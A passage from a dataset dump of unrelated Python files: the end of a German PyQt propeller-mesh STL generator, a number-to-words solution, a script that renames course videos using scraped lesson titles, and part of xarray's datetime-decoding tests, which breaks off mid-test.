[math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,3+zO])\r\n \r\n HubBottom.append( [math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,-3+zO])\r\n if i >= -40: #Koordinaten liste für den Oberen und Unteren Rand\r\n HubRimTop.append([math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,3+zO])\r\n HubRimBottom.append([math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,-3+zO])\r\n \r\n Kord = [] \r\n Achse2 += RingbreiteAussen*2 \r\n for i in range(19): # Umgedrehtehälfte der Kordinaten liste\r\n p = 90-i*10\r\n \r\n HubTop.append( [math.cos(math.radians(p))*(Achse2/2)+xO, 
math.sin(math.radians(p))*(Achse2/2)+yO ,3+zO])\r\n \r\n HubBottom.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,-3+zO])\r\n \r\n #Koordinaten zum verbinden mit dem Kreis\r\n Kord.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,3+zO])\r\n Kord.reverse()\r\n for i in range(19): \r\n p = 90-i*10\r\n Kord.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,-3+zO]) \r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(18*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,1-f+(18*2),0-f+(18*2)])\r\n f += 1\r\n \r\n \r\n \r\n \r\n # Unteren und Oberen Halbkreis Erstellen \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubTop)[f[j],:]\r\n \r\n Eckfolge = [] #Eckfolge für Unteren Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0-f+(18*2)])\r\n else:\r\n Eckfolge.append([0-f+(18*2),1-f+(18*2),0+f])\r\n f += 1\r\n \r\n Hub.append(Hubmesh.data)\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubBottom)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n \r\n # Koordinaten liste aus der Ober und Unterhälfte für die Hülle\r\n HubTop.reverse() #HubTop wird umgedreht eingesetzt\r\n \r\n HubComplete = HubBottom + HubTop\r\n \r\n \r\n \r\n #Eckfolge für die Hülle\r\n Eckfolge = []\r\n f = 0 \r\n for i in range(10):\r\n if i % 2 == 0:\r\n Eckfolge.append([2-f+(18*4),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,3-f+(18*4),2-f+(18*4)])\r\n f += 1\r\n # Zum Schließen der Form \r\n Eckfolge.append([0,38,75])#\r\n Eckfolge.append([0,37,38])#\r\n Eckfolge.append([56,19,18])#\r\n Eckfolge.append([18,57,56])#\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubComplete)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n #////////HubRim\\\\\\\\\\\\\\\\\\\r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(14*2-2): #Eckfolge für den Oberen Rand\r\n if i % 2 == 0:\r\n Eckfolge.append([1+f+(15),1+f,0+f])\r\n else:\r\n Eckfolge.append([1+f+(14),2+f+(14),0+f])\r\n f += 1\r\n \r\n #Rand wird dem Mesh hinzugefügt\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubRimTop)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(14*2-2): #Eckfolge für den Unteren Rand\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,1+f+(15)])\r\n else:\r\n Eckfolge.append([0+f,2+f+(14),1+f+(14)])\r\n f += 1\r\n \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubRimBottom)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n #/////// Verbindungs Stück \\\\\\\\\\\\\\\\ \r\n \r\n Kord.reverse()\r\n for i in range(18*2): #Koordinaten für einen Kreis zum verbinden mit dem Hub\r\n i -= 18\r\n i = i*10\r\n Kord.append( [Achse2/2+xO, 
(math.cos(math.radians(i))*6)+yO, (math.sin(math.radians(i))*3)+zO])\r\n \r\n \r\n \r\n Eckfolge = []\r\n f = 0 \r\n for i in range(18*4): #Für den Kreis mit dem Hub\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,2+f+(18*2)])\r\n else:\r\n Eckfolge.append([0+f,2+f+(18*2),1+f+(18*2)])\r\n f += 1\r\n Eckfolge.append([36,37,38])\r\n Eckfolge.append([36,38,73])\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n #Kreis an die Airfoil besfestigen\r\n \r\n \r\n Kord = []\r\n for i in range(18*2): #Koordinaten für einen Kreis zum verbinden mit dem Hub\r\n i -= 18\r\n i = i*10\r\n Kord.append( [Achse2/2+xO, (math.cos(math.radians(i))*6)+yO, (math.sin(math.radians(i))*3)+zO])\r\n Kord.reverse() \r\n Kord = Kord+KordC\r\n \r\n \r\n Eckfolge = []\r\n f = 0\r\n g = 0\r\n h = 0\r\n for i in range(158-1):\r\n if h <= 3.38888:\r\n Eckfolge.append([36+f,37+f,0+g])\r\n f += 1\r\n h += 0.9\r\n \r\n else:\r\n Eckfolge.append([1+g,0+g,36+f])\r\n \r\n g += 1\r\n h -= 3\r\n if g == 36:\r\n g = 0\r\n Eckfolge.append([0, 35, 157])\r\n \r\n \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n #//////////////Propeller Ring\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n \r\n \r\n RingTopIn = []\r\n RingBottomIn = []\r\n Achse3 = Achse + InnerRingBreite*2 + Ringabstand\r\n \r\n \r\n for i in range(36): #Koordinaten Liste für Oberen und Unteren kreis\r\n i -= 9\r\n i = i*10\r\n \r\n RingTopIn.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,2])\r\n \r\n RingBottomIn.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,0])\r\n \r\n \r\n Kord = RingTopIn + RingBottomIn\r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen und Unteren Kreis\r\n f = 0 \r\n for i in range(36*2-1):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0+f+(36)])\r\n else:\r\n Eckfolge.append([0+f+(36-1),0+f,1+f+(36-1)])\r\n f += 1\r\n \r\n Eckfolge.append([35,71,70])\r\n \r\n \r\n \r\n \r\n Ring = []\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n RingTop = []\r\n RingBottom = []\r\n Achse3 = Achse + InnerRingBreite*2 + Ringabstand + RingbreiteAussen*2\r\n \r\n \r\n for i in range(36): #Koordinaten Liste für Oberen und Unteren kreis\r\n i -= 9\r\n i = i*10\r\n \r\n RingTop.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,2])\r\n \r\n RingBottom.append( [math.cos(math.radians(i))*(Achse3/2)+xO, math.sin(math.radians(i))*(Achse3/2)+yO ,0])\r\n \r\n \r\n \r\n \r\n \r\n Kord = RingTop + RingTopIn\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen und Unteren Kreis\r\n f = 0 \r\n for i in range(36*2-1):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f+(36),1+f,0+f])\r\n else:\r\n 
Eckfolge.append([1+f+(36-1),0+f,0+f+(36-1)])\r\n f += 1\r\n \r\n Eckfolge.append([70,71,35])\r\n \r\n Kord = RingTop + RingBottom\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data)\r\n \r\n \r\n Kord = RingBottom + RingBottomIn\r\n \r\n Ringmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Ringmesh.vectors[i][j] = np.array(Kord)[f[j],:] \r\n Ring.append(Ringmesh.data) \r\n \r\n \r\n \r\n \r\n Ring = mesh.Mesh(np.concatenate(Ring))\r\n self.Ring = Ring\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #///////Export\\\\\\\\\\\\\r\n \r\n \r\n Propeller = Propeller+Hub \r\n \r\n \r\n Propeller = mesh.Mesh(np.concatenate(Propeller))\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n #3D Render anzeigen\r\n self.bild = vpl.QtFigure(\"bild\")\r\n self.gridLayout.addWidget(self.bild, 0, 0, 1, 1)\r\n \r\n \r\n vpl.mesh_plot(Propeller)\r\n vpl.mesh_plot(Ring)\r\n \r\n \r\n\r\n \r\n self.bild.update() \r\n \r\n self.Propeller = Propeller\r\n \r\n \r\n self.Table()\r\n \r\n \r\n \r\n def Table(self):\r\n #Erstellung der Tabelle für die Geschwindigkeit und Winkel werte\r\n self.table.setRowCount(len(self.UI))\r\n self.table.setColumnCount(len(self.UI[0]))\r\n self.table.setHorizontalHeaderLabels([\"Profil v in m/s\", \"Profil Winkel\"])\r\n for i,row in enumerate(self.UI):\r\n for j,val in enumerate(row):\r\n self.table.setItem(i,j,QtWidgets.QTableWidgetItem(str(val)))\r\n \r\n self.table.setEditTriggers(QtWidgets.QTableWidget.NoEditTriggers)\r\n \r\n \r\n\r\n def Export(self):\r\n \r\n \r\n \r\n #Create directory\r\n dirName = self.path +'\\Optiprop'\r\n \r\n #Wenn Optiprop Ordener noch nicht vorhanden ist wird ein neuer erstellt \r\n if not os.path.exists(dirName):\r\n os.mkdir(dirName)\r\n \r\n \r\n #Propeller Rotieren um die Richtige Orientierung zu haben zum Drucken\r\n self.Propeller.rotate([0.5, 0.0, 0.0], math.radians(-90))\r\n Propname = \"\\PropellerL\" + str(int(self.L)) + \"Kv\" + str(int(self.Kv)) + \"Lg\" + str(int(self.LGeschwindigkeit)) + \"D\" +str(self.Achse-0.8) + \".stl\"\r\n \r\n #Propeller Export\r\n self.Propeller.save(dirName + Propname) \r\n #Confirmation\r\n self.labelX.setText(\"Export Complete\")\r\n #Ring Export\r\n self.Ring.save(dirName + \"\\Ring_D_\"+str(self.Achse-0.8)+\"mm.stl\")\r\n \r\n \r\n \r\n \r\n \r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n ","sub_path":"Optiprop Stadalone v0.4.py","file_name":"Optiprop Stadalone v0.4.py","file_ext":"py","file_size_in_byte":45853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"601737234","text":"from typing import List\nimport re\n\n\nclass Solution:\n def __init__(self):\n self.cardinal = {\"0\": \"\", \"1\": \"One\", \"2\": \"Two\", \"3\": \"Three\", \"4\": \"Four\", \"5\": \"Five\", \"6\": \"Six\",\n \"7\": \"Seven\", \"8\": \"Eight\", \"9\": \"Nine\"}\n\n self.mults = {1: \"\", 2: \"Thousand\", 3: \"Million\", 4: \"Billion\"}\n self.teens = {\"10\": \"Ten\", \"11\": \"Eleven\", \"12\": \"Twelve\", \"13\": \"Thirteen\",\n \"14\": \"Fourteen\", 
\"15\": \"Fifteen\", \"16\": \"Sixteen\", \"17\": \"Seventeen\",\n                      \"18\": \"Eighteen\", \"19\": \"Nineteen\"}\n        self.ees = {\"1\": \"Teen\", \"2\": \"Twenty\", \"3\": \"Thirty\", \"4\": \"Forty\", \"5\": \"Fifty\", \"6\": \"Sixty\",\n                    \"7\": \"Seventy\", \"8\": \"Eighty\", \"9\": \"Ninety\"}\n\n    def Triplets(self, num: int) -> List:\n        # split the decimal digits into groups of three, most significant group first\n        n = str(num)\n        t = list()\n        while n != '':\n            t.append(n[-3:])\n            n = n[0:-3]\n        t.reverse()\n        return t\n\n    def SayIt(self, t: str, m: int):\n        # print(\"Doing: {}\".format(t))\n        t = t.lstrip(\"0\")\n        s = \"\"\n        if t == \"\":\n            # print(\"Zero: {}\".format(self.mults[m]))\n            return self.mults[m]\n        if len(t) == 3:\n            s += self.cardinal[t[0]] + \" Hundred \"\n            t = t[1:]\n            if t == \"00\":\n                s += \" \" + self.mults[m] + \" \"\n                return \"{}\".format(s)\n        if len(t) == 2:\n            if 10 < int(t) < 20:\n                s += self.teens[t]\n            elif int(t) > 10:\n                s += self.ees[t[0]] + \" \" + self.cardinal[t[1]]\n            elif int(t) == 10:\n                s += \"Ten\"\n            elif int(t) < 10:\n                s += self.cardinal[t[1]]\n            s += \" \" + self.mults[m]\n        else:\n            s += self.cardinal[t]\n            s += \" \" + self.mults[m]\n        if m != 1:\n            s += \" \"\n        return \"{}\".format(s)\n\n    def numberToWords(self, num: int) -> str:\n        a = \"\"\n        if num == 0:\n            return \"Zero\"\n        trips = self.Triplets(num)\n        m = len(trips)\n        for t in trips:\n            a += self.SayIt(t, m)\n            m -= 1\n        # drop the scale words left over from all-zero triplets,\n        # then collapse any double spaces the fixups leave behind\n        a = re.sub('Million Thousand', 'Million ', a)\n        a = re.sub('Billion Million', 'Billion ', a)\n        a = re.sub('Billion Thousand', 'Billion ', a)\n        a = re.sub(' +', ' ', a)\n        return a.strip()\n","sub_path":"leet273/words/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
+{"seq_id":"295855684","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\n\nurl = 'http://www.maiziedu.com/course/337/'\ndir_path = 'E:\\迅雷下载\\麦子学院-Redis入门'\n\ndef mp4_title(url):\n    html = requests.get(url)\n    Soup = BeautifulSoup(html.content,'html.parser')\n    all_li = Soup.find('ul',class_='lesson-lists').findAll('li')\n    titles = []\n    for i in all_li:\n        titles.append(i.find('span',class_='fl').text)\n    return titles\n\ndef change_files_name(dir_path,url):\n    os.chdir(dir_path)  # change into the target directory\n    titles = mp4_title(url)\n    n = 0\n    for title in titles:\n        n += 1\n        os.rename('redisrm'+str(n)+'.mp4',title+'.mp4')\nchange_files_name(dir_path,url)\n","sub_path":"麦子学院-Redis入门-视频名称批量修改.py","file_name":"麦子学院-Redis入门-视频名称批量修改.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
+{"seq_id":"484904677","text":"import contextlib\nimport numpy as np\nimport pandas as pd\nimport warnings\n\nfrom xarray import conventions, Variable, Dataset, open_dataset\nfrom xarray.core import utils, indexing\nfrom . 
import TestCase, requires_netCDF4, unittest\nfrom .test_backends import CFEncodedDataTest\nfrom xarray.core.pycompat import iteritems\nfrom xarray.backends.memory import InMemoryDataStore\nfrom xarray.backends.common import WritableCFDataStore\nfrom xarray.conventions import decode_cf\n\n\nclass TestMaskedAndScaledArray(TestCase):\n def test(self):\n x = conventions.MaskedAndScaledArray(np.arange(3), fill_value=0)\n self.assertEqual(x.dtype, np.dtype('float'))\n self.assertEqual(x.shape, (3,))\n self.assertEqual(x.size, 3)\n self.assertEqual(x.ndim, 1)\n self.assertEqual(len(x), 3)\n self.assertArrayEqual([np.nan, 1, 2], x)\n\n x = conventions.MaskedAndScaledArray(np.arange(3), add_offset=1)\n self.assertArrayEqual(np.arange(3) + 1, x)\n\n x = conventions.MaskedAndScaledArray(np.arange(3), scale_factor=2)\n self.assertArrayEqual(2 * np.arange(3), x)\n\n x = conventions.MaskedAndScaledArray(np.array([-99, -1, 0, 1, 2]),\n -99, 0.01, 1)\n expected = np.array([np.nan, 0.99, 1, 1.01, 1.02])\n self.assertArrayEqual(expected, x)\n\n def test_0d(self):\n x = conventions.MaskedAndScaledArray(np.array(0), fill_value=0)\n self.assertTrue(np.isnan(x))\n self.assertTrue(np.isnan(x[...]))\n\n x = conventions.MaskedAndScaledArray(np.array(0), fill_value=10)\n self.assertEqual(0, x[...])\n\n def test_multiple_fill_value(self):\n x = conventions.MaskedAndScaledArray(\n np.arange(4), fill_value=np.array([0, 1]))\n self.assertArrayEqual([np.nan, np.nan, 2, 3], x)\n\n x = conventions.MaskedAndScaledArray(\n np.array(0), fill_value=np.array([0, 1]))\n self.assertTrue(np.isnan(x))\n self.assertTrue(np.isnan(x[...]))\n\n\nclass TestCharToStringArray(TestCase):\n def test_wrapper_class(self):\n array = np.array(list('abc'), dtype='S')\n actual = conventions.CharToStringArray(array)\n expected = np.array('abc', dtype='S')\n self.assertEqual(actual.dtype, expected.dtype)\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(actual.size, expected.size)\n self.assertEqual(actual.ndim, expected.ndim)\n with self.assertRaises(TypeError):\n len(actual)\n self.assertArrayEqual(expected, actual)\n with self.assertRaises(IndexError):\n actual[:2]\n self.assertEqual(str(actual), 'abc')\n\n array = np.array([list('abc'), list('cdf')], dtype='S')\n actual = conventions.CharToStringArray(array)\n expected = np.array(['abc', 'cdf'], dtype='S')\n self.assertEqual(actual.dtype, expected.dtype)\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(actual.size, expected.size)\n self.assertEqual(actual.ndim, expected.ndim)\n self.assertEqual(len(actual), len(expected))\n self.assertArrayEqual(expected, actual)\n self.assertArrayEqual(expected[:1], actual[:1])\n with self.assertRaises(IndexError):\n actual[:, :2]\n\n def test_char_to_string(self):\n array = np.array([['a', 'b', 'c'], ['d', 'e', 'f']])\n expected = np.array(['abc', 'def'])\n actual = conventions.char_to_string(array)\n self.assertArrayEqual(actual, expected)\n\n expected = np.array(['ad', 'be', 'cf'])\n actual = conventions.char_to_string(array.T) # non-contiguous\n self.assertArrayEqual(actual, expected)\n\n def test_string_to_char(self):\n array = np.array([['ab', 'cd'], ['ef', 'gh']])\n expected = np.array([[['a', 'b'], ['c', 'd']],\n [['e', 'f'], ['g', 'h']]])\n actual = conventions.string_to_char(array)\n self.assertArrayEqual(actual, expected)\n\n expected = np.array([[['a', 'b'], ['e', 'f']],\n [['c', 'd'], ['g', 'h']]])\n actual = conventions.string_to_char(array.T)\n self.assertArrayEqual(actual, expected)\n\n\nclass 
TestBoolTypeArray(TestCase):\n def test_booltype_array(self):\n x = np.array([1, 0, 1, 1, 0], dtype='i1')\n bx = conventions.BoolTypeArray(x)\n self.assertEqual(bx.dtype, np.bool)\n self.assertArrayEqual(bx, np.array([True, False, True, True, False],\n dtype=np.bool))\n\n\n@np.vectorize\ndef _ensure_naive_tz(dt):\n if hasattr(dt, 'tzinfo'):\n return dt.replace(tzinfo=None)\n else:\n return dt\n\n\nclass TestDatetime(TestCase):\n @requires_netCDF4\n def test_cf_datetime(self):\n import netCDF4 as nc4\n for num_dates, units in [\n (np.arange(10), 'days since 2000-01-01'),\n (np.arange(10).reshape(2, 5), 'days since 2000-01-01'),\n (12300 + np.arange(5), 'hours since 1680-01-01 00:00:00'),\n # here we add a couple minor formatting errors to test\n # the robustness of the parsing algorithm.\n (12300 + np.arange(5), 'hour since 1680-01-01 00:00:00'),\n (12300 + np.arange(5), u'Hour since 1680-01-01 00:00:00'),\n (12300 + np.arange(5), ' Hour since 1680-01-01 00:00:00 '),\n (10, 'days since 2000-01-01'),\n ([10], 'daYs since 2000-01-01'),\n ([[10]], 'days since 2000-01-01'),\n ([10, 10], 'days since 2000-01-01'),\n (np.array(10), 'days since 2000-01-01'),\n (0, 'days since 1000-01-01'),\n ([0], 'days since 1000-01-01'),\n ([[0]], 'days since 1000-01-01'),\n (np.arange(2), 'days since 1000-01-01'),\n (np.arange(0, 100000, 20000), 'days since 1900-01-01'),\n (17093352.0, 'hours since 1-1-1 00:00:0.0'),\n ([0.5, 1.5], 'hours since 1900-01-01T00:00:00'),\n (0, 'milliseconds since 2000-01-01T00:00:00'),\n (0, 'microseconds since 2000-01-01T00:00:00'),\n ]:\n for calendar in ['standard', 'gregorian', 'proleptic_gregorian']:\n expected = _ensure_naive_tz(nc4.num2date(num_dates, units, calendar))\n print(num_dates, units, calendar)\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore',\n 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(num_dates, units,\n calendar)\n if (isinstance(actual, np.ndarray) and\n np.issubdtype(actual.dtype, np.datetime64)):\n # self.assertEqual(actual.dtype.kind, 'M')\n # For some reason, numpy 1.8 does not compare ns precision\n # datetime64 arrays as equal to arrays of datetime objects,\n # but it works for us precision. 
Thus, convert to us\n # precision for the actual array equal comparison...\n actual_cmp = actual.astype('M8[us]')\n else:\n actual_cmp = actual\n self.assertArrayEqual(expected, actual_cmp)\n encoded, _, _ = conventions.encode_cf_datetime(actual, units,\n calendar)\n if '1-1-1' not in units:\n # pandas parses this date very strangely, so the original\n # units/encoding cannot be preserved in this case:\n # (Pdb) pd.to_datetime('1-1-1 00:00:0.0')\n # Timestamp('2001-01-01 00:00:00')\n self.assertArrayEqual(num_dates, np.around(encoded, 1))\n if (hasattr(num_dates, 'ndim') and num_dates.ndim == 1 and\n '1000' not in units):\n # verify that wrapping with a pandas.Index works\n # note that it *does not* currently work to even put\n # non-datetime64 compatible dates into a pandas.Index :(\n encoded, _, _ = conventions.encode_cf_datetime(\n pd.Index(actual), units, calendar)\n self.assertArrayEqual(num_dates, np.around(encoded, 1))\n\n @requires_netCDF4\n def test_decode_cf_datetime_overflow(self):\n # checks for \n # https://github.com/pydata/pandas/issues/14068\n # https://github.com/pydata/xarray/issues/975\n\n from datetime import datetime \n units = 'days since 2000-01-01 00:00:00'\n\n # date after 2262 and before 1678\n days = (-117608, 95795)\n expected = (datetime(1677, 12, 31), datetime(2262, 4, 12))\n\n for i, day in enumerate(days):\n result = conventions.decode_cf_datetime(day, units)\n self.assertEqual(result, expected[i])\n\n @requires_netCDF4\n def test_decode_cf_datetime_transition_to_invalid(self):\n # manually create dataset with not-decoded date\n from datetime import datetime\n ds = Dataset(coords={'time' : [0, 266 * 365]})\n units = 'days since 2000-01-01 00:00:00'\n ds.time.attrs = dict(units=units)\n ds_decoded = conventions.decode_cf(ds)\n\n expected = [datetime(2000, 1, 1, 0, 0),\n datetime(2265, 10, 28, 0, 0)]\n\n self.assertArrayEqual(ds_decoded.time.values, expected)\n\n def test_decoded_cf_datetime_array(self):\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual, expected)\n\n # default calendar\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01')\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual, expected)\n\n def test_slice_decoded_cf_datetime_array(self):\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual[slice(0, 2)], expected[slice(0, 2)])\n\n actual = conventions.DecodedCFDatetimeArray(\n np.array([0, 1, 2]), 'days since 1900-01-01', 'standard')\n expected = pd.date_range('1900-01-01', periods=3).values\n self.assertEqual(actual.dtype, np.dtype('datetime64[ns]'))\n self.assertArrayEqual(actual[[0, 2]], expected[[0, 2]])\n\n def test_decode_cf_datetime_non_standard_units(self):\n expected = pd.date_range(periods=100, start='1970-01-01', freq='h')\n # netCDFs from madis.noaa.gov use this format for their time units\n # they cannot be parsed by netcdftime, but pd.Timestamp works\n units = 'hours since 1-1-1970'\n actual = conventions.decode_cf_datetime(np.arange(100), units)\n self.assertArrayEqual(actual, expected)\n\n def 
test_decode_cf_with_conflicting_fill_missing_value(self):\n var = Variable(['t'], np.arange(10),\n {'units': 'foobar',\n 'missing_value': 0,\n '_FillValue': 1})\n self.assertRaisesRegexp(ValueError, \"_FillValue and missing_value\",\n lambda: conventions.decode_cf_variable(var))\n\n @requires_netCDF4\n def test_decode_cf_datetime_non_iso_strings(self):\n # datetime strings that are _almost_ ISO compliant but not quite,\n # but which netCDF4.num2date can still parse correctly\n expected = pd.date_range(periods=100, start='2000-01-01', freq='h')\n cases = [(np.arange(100), 'hours since 2000-01-01 0'),\n (np.arange(100), 'hours since 2000-1-1 0'),\n (np.arange(100), 'hours since 2000-01-01 0:00')]\n for num_dates, units in cases:\n actual = conventions.decode_cf_datetime(num_dates, units)\n self.assertArrayEqual(actual, expected)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar(self):\n import netCDF4 as nc4\n\n for calendar in ['noleap', '365_day', '360_day', 'julian', 'all_leap',\n '366_day']:\n units = 'days since 0001-01-01'\n times = pd.date_range('2001-04-01-00', end='2001-04-30-23',\n freq='H')\n noleap_time = nc4.date2num(times.to_pydatetime(), units,\n calendar=calendar)\n expected = times.values\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(noleap_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n abs_diff = abs(actual - expected)\n # once we no longer support versions of netCDF4 older than 1.1.5,\n # we could do this check with near microsecond accuracy:\n # https://github.com/Unidata/netcdf4-python/issues/355\n self.assertTrue((abs_diff <= np.timedelta64(1, 's')).all())\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_single_element(self):\n units = 'days since 0001-01-01'\n for calendar in ['noleap', '365_day', '360_day', 'julian', 'all_leap',\n '366_day']:\n for num_time in [735368, [735368], [[735368]]]:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore',\n 'Unable to decode time axis')\n actual = conventions.decode_cf_datetime(num_time, units,\n calendar=calendar)\n self.assertEqual(actual.dtype, np.dtype('M8[ns]'))\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_single_element_fallback(self):\n import netCDF4 as nc4\n\n units = 'days since 0001-01-01'\n dt = nc4.netcdftime.datetime(2001, 2, 29)\n for calendar in ['360_day', 'all_leap', '366_day']:\n num_time = nc4.date2num(dt, units, calendar)\n with self.assertWarns('Unable to decode time axis'):\n actual = conventions.decode_cf_datetime(num_time, units,\n calendar=calendar)\n expected = np.asarray(nc4.num2date(num_time, units, calendar))\n print(num_time, calendar, actual, expected)\n self.assertEqual(actual.dtype, np.dtype('O'))\n self.assertEqual(expected, actual)\n\n @requires_netCDF4\n def test_decode_non_standard_calendar_multidim_time(self):\n import netCDF4 as nc4\n\n calendar = 'noleap'\n units = 'days since 0001-01-01'\n times1 = pd.date_range('2001-04-01', end='2001-04-05', freq='D')\n times2 = pd.date_range('2001-05-01', end='2001-05-05', freq='D')\n noleap_time1 = nc4.date2num(times1.to_pydatetime(), units,\n calendar=calendar)\n noleap_time2 = nc4.date2num(times2.to_pydatetime(), units,\n calendar=calendar)\n mdim_time = np.empty((len(noleap_time1), 2), )\n mdim_time[:, 0] = noleap_time1\n 